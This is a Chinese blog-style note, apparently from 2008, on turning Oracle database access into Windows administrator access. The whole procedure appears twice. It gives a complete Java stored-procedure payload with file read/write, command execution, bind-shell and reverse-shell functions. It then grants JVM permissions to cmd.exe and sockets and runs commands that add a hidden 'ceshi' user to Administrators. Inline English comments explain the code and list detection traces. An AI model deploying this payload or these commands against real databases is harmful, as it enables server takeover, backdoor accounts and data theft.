利用Oracle漏洞提权笔记
2008-08-31 13:50
1.利用已知的Oracle用户名连上数据库,并创建java提权函数
C:/WINDOWS/system32>sqlplus /nolog
SQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
SQL> conn ysreal/ysreal@(description=(address_list=(address=(protocol=tcp)(host=
10.100.0.239)(port=1521)))(connect_data=(SERVICE_NAME=WORK)));
已连接。
SQL>
SQL> create or replace and compile java source named paeq as
2 import java.io.*;
3 import java.net.*;
// Oracle Java stored-procedure payload. The transcript compiles this class
// inside the database with "create or replace and compile java source" and
// then exposes each static method to SQL through a PL/SQL call spec
// (PAEQ_LISTFOLDER, PAEQ_SAVEFILE, PAEQ_READFILE, PAEQ_EXECFILE,
// PAEQ_BINDSHELL). Everything here runs in the database server's JVM under
// the OS identity of the Oracle server process; what it may touch is bounded
// only by the DBMS_JAVA.GRANT_PERMISSION grants made in step 2
// (java.io.FilePermission on cmd.exe, java.lang.RuntimePermission
// writeFileDescriptor, java.net.SocketPermission "*:*").
// Defensive review points: a Java source object appearing in an application
// schema, JVM policy grants such as SocketPermission "*:*" (visible in
// DBA_JAVA_POLICY), a listening or outbound TCP socket owned by the database
// server process, and child processes (cmd.exe) spawned by it are the
// observable traces of this technique.
4 public class PAEQ{
// Directory listing. Returns the entry names each followed by the literal
// four characters "/r/n" as written in the source (forward slashes), or ""
// when File.list() returns null (path missing or not a directory).
5 public static String listFolder(String path){
6 File f=null;
7 String str="";
8 f=new File(path);
9 String[] files=f.list();
10 if(files!=null)
11 for(int i=0;i<files.length;i++){
12 str+=files[i]+"/r/n";
13 }
14 return str;
15 }
// Creates or truncates filepath and writes value encoded with the JVM's
// default charset (String.getBytes() with no charset argument). Returns
// "OK" on success, otherwise the exception message; the stream is closed
// in finally either way.
16 public static String saveFile(String filepath,String value){
17 FileOutputStream fos=null;
18 try {
19 fos=new FileOutputStream(filepath);
20 fos.write(value.getBytes());
21 return "OK";
22 } catch (Exception e) {
23 return e.getMessage();
24 } finally{
25 if(fos!=null){
26 try {fos.close();} catch (Exception e) {}
27 }
28 }
29 }
// Reads pathfile line by line using the charset named by code (the shell
// prompt suggests "GBK") and returns the lines concatenated with no
// separator, since readLine() strips the terminators. Any exception
// (unreadable path, unknown charset name) is reported through its message.
30 public static String readFile(String pathfile,String code){
31 BufferedReader br=null;
32 String value="";
33 try {
34 br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile
),code));
35 String s=null;
36 while((s=br.readLine())!=null){
37 value+=s;
38 }
39 return value;
40 } catch (Exception e) {
41 return e.getMessage();
42 } finally{
43 if(br!=null){try {br.close();} catch (IOException e) {}}
44 }
45 }
// Runs filepath via Runtime.exec(String); the JVM splits that single string
// on whitespace into the command and its arguments, which is why the SQL
// calls further down pass a whole "cmd.exe /c ..." line. Returns everything
// the child wrote to stdout, decoded with the charset named by code. Only
// stdout is consumed: stderr is never read, and the process is neither
// waited for (no waitFor) nor destroyed.
46 public static String execFile(String filepath,String code){
// i: number of chars read into bufferC per iteration.
47 int i=0;
48 Runtime rt=Runtime.getRuntime();
49 String output="";
50 InputStreamReader isr = null;
51 char[] bufferC=new char[1024];
52 try{
53 Process ps=rt.exec(filepath);
54 isr=new InputStreamReader(ps.getInputStream(),code);
55 while((i=isr.read(bufferC,0,bufferC.length))!=-1){
56 output+=new String(bufferC,0,i);
57 }
58 return output;
59 }catch(Exception e){
60 return e.getMessage();
61 }finally{
62 if(isr!=null)try {isr.close();} catch (IOException e) {}
63 }
64 }
// Listens on port, blocks in accept() for exactly one connection, then hands
// both the listening socket and the accepted socket to an optShell thread and
// returns "OK". The SQL session that calls this stays blocked until a peer
// connects. On an exception the message is returned; there is no finally
// here, so a ServerSocket that was already opened is not closed on that
// path. On success optShell closes both sockets when its loop ends, so one
// call serves one client session.
65 public static String bindShell(int port){
66 ServerSocket ss=null;
67 Socket s=null;
68 try {
69 ss = new ServerSocket(port);
70 s=ss.accept();
71 new optShell(ss,s).start();
72
73 return "OK";
74 } catch (Exception e) {
75 return e.getMessage();
76 }
77 }
// Connects out to host:port and serves the command loop over that socket;
// optShell receives null for the ServerSocket. Returns "OK" once the thread
// is started, or the exception message if the connect fails. The transcript
// creates no PL/SQL call spec for this method, only for bindShell.
78 public static String reverseShell(String host,int port){
79 Socket s=null;
80 try{
81 s=new Socket(host,port);
82 new optShell(null,s).start();
83 return "OK";
84 }catch(Exception e){
85 return e.getMessage();
86 }
87 }
// Line-oriented command loop served over one socket on its own thread.
// Fields are package-private and assigned by the constructor; ss is null in
// the reverseShell case.
88 public static class optShell extends Thread{
89 OutputStream os=null;
90 InputStream is=null;
91 ServerSocket ss;
92 Socket s;
// Takes ownership of the streams of s. If obtaining them fails, whatever
// was opened (including the listening socket) is closed here, but the
// exception is swallowed and the caller still starts the thread.
93 public optShell(ServerSocket ss,Socket s){
94 this.ss=ss;
95 this.s=s;
96 try{
97 this.is=s.getInputStream();
98 this.os=s.getOutputStream();
99 }catch(Exception e){
100 if(os!=null)try {os.close();} catch(Exception ex) {}
101 if(is!=null)try {is.close();} catch(Exception ex) {}
102 if(s!=null)try {s.close();} catch(Exception ex) {}
103 if(ss!=null)try {ss.close();} catch(Exception ex) {}
104 }
105 }
// Protocol: every request is one line; the first four characters of the
// trimmed line select the command (list, save, read, exec), and each
// command then prompts for its arguments on the following lines. Any other
// line, including one of three characters or fewer, gets the help text.
// The literal "exit" ends the loop. Responses are written with the JVM
// default charset, and prompts use the literal "/r/n" as written.
// If the peer disconnects, readLine() returns null, the null line reaches
// line.length(), the resulting exception is caught and printed to the
// JVM's standard error stream, and finally closes the streams, the socket
// and (for a bind shell) the listening socket.
106 public void run(){
107 BufferedReader br=new BufferedReader(new InputStreamReader(is));
108 String line="";
109 String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";
110 try {
111 //os.write(cmdhelp.getBytes());
112 line=br.readLine();
113 while(!"exit".equals(line)){
114 if(line.length()>3){
115 StringBuffer sb=new StringBuffer(line.trim());
116 String cmd=sb.substring(0, 4);
117 if(cmd.equals("list")){
118 os.write("input you path:/r/n".getBytes());
119 line=br.readLine();
120 os.write(listFolder(line).getBytes());
121 }else if("save".equals(cmd)){
122 os.write("input you filepath:/r/n".getBytes());
123 line=br.readLine();
124 os.write("input you value:/r/n".getBytes());
125 os.write(saveFile(line,br.readLine()).getBytes());
126 }else if("read".equals(cmd)){
127 os.write("input you filepath:/r/n".getBytes());
128 line=br.readLine();
129 os.write("input you code examle:GBK/r/n".getBytes());
130 os.write(readFile(line,br.readLine()).getBytes());
131 }else if("exec".equals(cmd)){
132 os.write("input you run filepath:/r/n".getBytes());
133 line=br.readLine();
134 os.write("input you code examle:GBK/r/n".getBytes());
135 os.write(execFile(line,br.readLine()).getBytes());
136 }else{
137 os.write(cmdhelp.getBytes());
138 }
139 }else{
140 os.write(cmdhelp.getBytes());
141 }
142 line=br.readLine();
143 }
144 } catch (Exception e) {
145 e.printStackTrace();
146 }finally{
147 if(os!=null)try {os.close();} catch(Exception e) {}
148 if(is!=null)try {is.close();} catch(Exception e) {}
149 if(s!=null)try {s.close();} catch(Exception e) {}
150 if(ss!=null)try {ss.close();} catch(Exception e) {}
151 }
152 }
153 }
154 }
155 /
Java 已创建。
SQL> create or replace function PAEQ_LISTFOLDER(str varchar2) return varchar2
2 as language java name 'PAEQ.listFolder(java.lang.String) return java.lang.S
tring';
3 /
函数已创建。
SQL> create or replace function PAEQ_SAVEFILE(p varchar2,v varchar2) return varc
har2
2 as language java name 'PAEQ.saveFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_READFILE(p varchar2,c varchar2) return varc
har2
2 as language java name 'PAEQ.readFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_EXECFILE(fp varchar2,c varchar2) return var
char2
2 as language java name 'PAEQ.execFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';/
3 /
警告: 创建的函数带有编译错误。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';
3 /
函数已创建。
2.授予权限
SQL> begin
2 Dbms_Java.Grant_Permission('YSREAL','java.io.FilePermission','c:/WINDOWS/sy
stem32/cmd.exe','read,write,execute,delete');
3 Dbms_Java.Grant_Permission('YSREAL','java.lang.RuntimePermission','*','writ
eFileDescriptor');
4 Dbms_Java.grant_permission('YSREAL','java.net.SocketPermission','*:*','acce
pt,connect,listen,resolve');
5 end;
6 /
PL/SQL 过程已成功完成。
3.添加操作系统用户
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net user ceshi ceshi /
add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETUSERCESHICESHI/ADD','GBK')
--------------------------------------------------------------------------------
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net localgroup Adminis
trators ceshi /add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETLOCALGROUPADMINISTRATORSCESHI/ADD
--------------------------------------------------------------------------------
大功告成,如果系统默认开了远程就可以直接拿用户"ceshi"进行远程连接了。
C:/WINDOWS/system32>sqlplus /nolog
SQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
SQL> conn ysreal/ysreal@(description=(address_list=(address=(protocol=tcp)(host=
10.100.0.239)(port=1521)))(connect_data=(SERVICE_NAME=WORK)));
已连接。
SQL>
SQL> create or replace and compile java source named paeq as
2 import java.io.*;
3 import java.net.*;
// Oracle Java stored-procedure payload. The transcript compiles this class
// inside the database with "create or replace and compile java source" and
// then exposes each static method to SQL through a PL/SQL call spec
// (PAEQ_LISTFOLDER, PAEQ_SAVEFILE, PAEQ_READFILE, PAEQ_EXECFILE,
// PAEQ_BINDSHELL). Everything here runs in the database server's JVM under
// the OS identity of the Oracle server process; what it may touch is bounded
// only by the DBMS_JAVA.GRANT_PERMISSION grants made in step 2
// (java.io.FilePermission on cmd.exe, java.lang.RuntimePermission
// writeFileDescriptor, java.net.SocketPermission "*:*").
// Defensive review points: a Java source object appearing in an application
// schema, JVM policy grants such as SocketPermission "*:*" (visible in
// DBA_JAVA_POLICY), a listening or outbound TCP socket owned by the database
// server process, and child processes (cmd.exe) spawned by it are the
// observable traces of this technique.
4 public class PAEQ{
// Directory listing. Returns the entry names each followed by the literal
// four characters "/r/n" as written in the source (forward slashes), or ""
// when File.list() returns null (path missing or not a directory).
5 public static String listFolder(String path){
6 File f=null;
7 String str="";
8 f=new File(path);
9 String[] files=f.list();
10 if(files!=null)
11 for(int i=0;i<files.length;i++){
12 str+=files[i]+"/r/n";
13 }
14 return str;
15 }
// Creates or truncates filepath and writes value encoded with the JVM's
// default charset (String.getBytes() with no charset argument). Returns
// "OK" on success, otherwise the exception message; the stream is closed
// in finally either way.
16 public static String saveFile(String filepath,String value){
17 FileOutputStream fos=null;
18 try {
19 fos=new FileOutputStream(filepath);
20 fos.write(value.getBytes());
21 return "OK";
22 } catch (Exception e) {
23 return e.getMessage();
24 } finally{
25 if(fos!=null){
26 try {fos.close();} catch (Exception e) {}
27 }
28 }
29 }
// Reads pathfile line by line using the charset named by code (the shell
// prompt suggests "GBK") and returns the lines concatenated with no
// separator, since readLine() strips the terminators. Any exception
// (unreadable path, unknown charset name) is reported through its message.
30 public static String readFile(String pathfile,String code){
31 BufferedReader br=null;
32 String value="";
33 try {
34 br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile
),code));
35 String s=null;
36 while((s=br.readLine())!=null){
37 value+=s;
38 }
39 return value;
40 } catch (Exception e) {
41 return e.getMessage();
42 } finally{
43 if(br!=null){try {br.close();} catch (IOException e) {}}
44 }
45 }
// Runs filepath via Runtime.exec(String); the JVM splits that single string
// on whitespace into the command and its arguments, which is why the SQL
// calls further down pass a whole "cmd.exe /c ..." line. Returns everything
// the child wrote to stdout, decoded with the charset named by code. Only
// stdout is consumed: stderr is never read, and the process is neither
// waited for (no waitFor) nor destroyed.
46 public static String execFile(String filepath,String code){
// i: number of chars read into bufferC per iteration.
47 int i=0;
48 Runtime rt=Runtime.getRuntime();
49 String output="";
50 InputStreamReader isr = null;
51 char[] bufferC=new char[1024];
52 try{
53 Process ps=rt.exec(filepath);
54 isr=new InputStreamReader(ps.getInputStream(),code);
55 while((i=isr.read(bufferC,0,bufferC.length))!=-1){
56 output+=new String(bufferC,0,i);
57 }
58 return output;
59 }catch(Exception e){
60 return e.getMessage();
61 }finally{
62 if(isr!=null)try {isr.close();} catch (IOException e) {}
63 }
64 }
// Listens on port, blocks in accept() for exactly one connection, then hands
// both the listening socket and the accepted socket to an optShell thread and
// returns "OK". The SQL session that calls this stays blocked until a peer
// connects. On an exception the message is returned; there is no finally
// here, so a ServerSocket that was already opened is not closed on that
// path. On success optShell closes both sockets when its loop ends, so one
// call serves one client session.
65 public static String bindShell(int port){
66 ServerSocket ss=null;
67 Socket s=null;
68 try {
69 ss = new ServerSocket(port);
70 s=ss.accept();
71 new optShell(ss,s).start();
72
73 return "OK";
74 } catch (Exception e) {
75 return e.getMessage();
76 }
77 }
// Connects out to host:port and serves the command loop over that socket;
// optShell receives null for the ServerSocket. Returns "OK" once the thread
// is started, or the exception message if the connect fails. The transcript
// creates no PL/SQL call spec for this method, only for bindShell.
78 public static String reverseShell(String host,int port){
79 Socket s=null;
80 try{
81 s=new Socket(host,port);
82 new optShell(null,s).start();
83 return "OK";
84 }catch(Exception e){
85 return e.getMessage();
86 }
87 }
// Line-oriented command loop served over one socket on its own thread.
// Fields are package-private and assigned by the constructor; ss is null in
// the reverseShell case.
88 public static class optShell extends Thread{
89 OutputStream os=null;
90 InputStream is=null;
91 ServerSocket ss;
92 Socket s;
// Takes ownership of the streams of s. If obtaining them fails, whatever
// was opened (including the listening socket) is closed here, but the
// exception is swallowed and the caller still starts the thread.
93 public optShell(ServerSocket ss,Socket s){
94 this.ss=ss;
95 this.s=s;
96 try{
97 this.is=s.getInputStream();
98 this.os=s.getOutputStream();
99 }catch(Exception e){
100 if(os!=null)try {os.close();} catch(Exception ex) {}
101 if(is!=null)try {is.close();} catch(Exception ex) {}
102 if(s!=null)try {s.close();} catch(Exception ex) {}
103 if(ss!=null)try {ss.close();} catch(Exception ex) {}
104 }
105 }
// Protocol: every request is one line; the first four characters of the
// trimmed line select the command (list, save, read, exec), and each
// command then prompts for its arguments on the following lines. Any other
// line, including one of three characters or fewer, gets the help text.
// The literal "exit" ends the loop. Responses are written with the JVM
// default charset, and prompts use the literal "/r/n" as written.
// If the peer disconnects, readLine() returns null, the null line reaches
// line.length(), the resulting exception is caught and printed to the
// JVM's standard error stream, and finally closes the streams, the socket
// and (for a bind shell) the listening socket.
106 public void run(){
107 BufferedReader br=new BufferedReader(new InputStreamReader(is));
108 String line="";
109 String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";
110 try {
111 //os.write(cmdhelp.getBytes());
112 line=br.readLine();
113 while(!"exit".equals(line)){
114 if(line.length()>3){
115 StringBuffer sb=new StringBuffer(line.trim());
116 String cmd=sb.substring(0, 4);
117 if(cmd.equals("list")){
118 os.write("input you path:/r/n".getBytes());
119 line=br.readLine();
120 os.write(listFolder(line).getBytes());
121 }else if("save".equals(cmd)){
122 os.write("input you filepath:/r/n".getBytes());
123 line=br.readLine();
124 os.write("input you value:/r/n".getBytes());
125 os.write(saveFile(line,br.readLine()).getBytes());
126 }else if("read".equals(cmd)){
127 os.write("input you filepath:/r/n".getBytes());
128 line=br.readLine();
129 os.write("input you code examle:GBK/r/n".getBytes());
130 os.write(readFile(line,br.readLine()).getBytes());
131 }else if("exec".equals(cmd)){
132 os.write("input you run filepath:/r/n".getBytes());
133 line=br.readLine();
134 os.write("input you code examle:GBK/r/n".getBytes());
135 os.write(execFile(line,br.readLine()).getBytes());
136 }else{
137 os.write(cmdhelp.getBytes());
138 }
139 }else{
140 os.write(cmdhelp.getBytes());
141 }
142 line=br.readLine();
143 }
144 } catch (Exception e) {
145 e.printStackTrace();
146 }finally{
147 if(os!=null)try {os.close();} catch(Exception e) {}
148 if(is!=null)try {is.close();} catch(Exception e) {}
149 if(s!=null)try {s.close();} catch(Exception e) {}
150 if(ss!=null)try {ss.close();} catch(Exception e) {}
151 }
152 }
153 }
154 }
155 /
Java 已创建。
SQL> create or replace function PAEQ_LISTFOLDER(str varchar2) return varchar2
2 as language java name 'PAEQ.listFolder(java.lang.String) return java.lang.S
tring';
3 /
函数已创建。
SQL> create or replace function PAEQ_SAVEFILE(p varchar2,v varchar2) return varc
har2
2 as language java name 'PAEQ.saveFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_READFILE(p varchar2,c varchar2) return varc
har2
2 as language java name 'PAEQ.readFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_EXECFILE(fp varchar2,c varchar2) return var
char2
2 as language java name 'PAEQ.execFile(java.lang.String,java.lang.String) ret
urn java.lang.String';
3 /
函数已创建。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';/
3 /
警告: 创建的函数带有编译错误。
SQL> create or replace function PAEQ_BINDSHELL(port number) return varchar2
2 as language java name 'PAEQ.bindShell(int) return java.lang.String';
3 /
函数已创建。
2.授予权限
SQL> begin
2 Dbms_Java.Grant_Permission('YSREAL','java.io.FilePermission','c:/WINDOWS/sy
stem32/cmd.exe','read,write,execute,delete');
3 Dbms_Java.Grant_Permission('YSREAL','java.lang.RuntimePermission','*','writ
eFileDescriptor');
4 Dbms_Java.grant_permission('YSREAL','java.net.SocketPermission','*:*','acce
pt,connect,listen,resolve');
5 end;
6 /
PL/SQL 过程已成功完成。
3.添加操作系统用户
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net user ceshi ceshi /
add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETUSERCESHICESHI/ADD','GBK')
--------------------------------------------------------------------------------
SQL> select PAEQ_EXECFILE('C:/WINDOWS/system32/cmd.exe /c net localgroup Adminis
trators ceshi /add','GBK') from dual;
PAEQ_EXECFILE('C:/WINDOWS/SYSTEM32/CMD.EXE/CNETLOCALGROUPADMINISTRATORSCESHI/ADD
--------------------------------------------------------------------------------
大功告成,如果系统默认开了远程就可以直接拿用户"ceshi"进行远程连接了。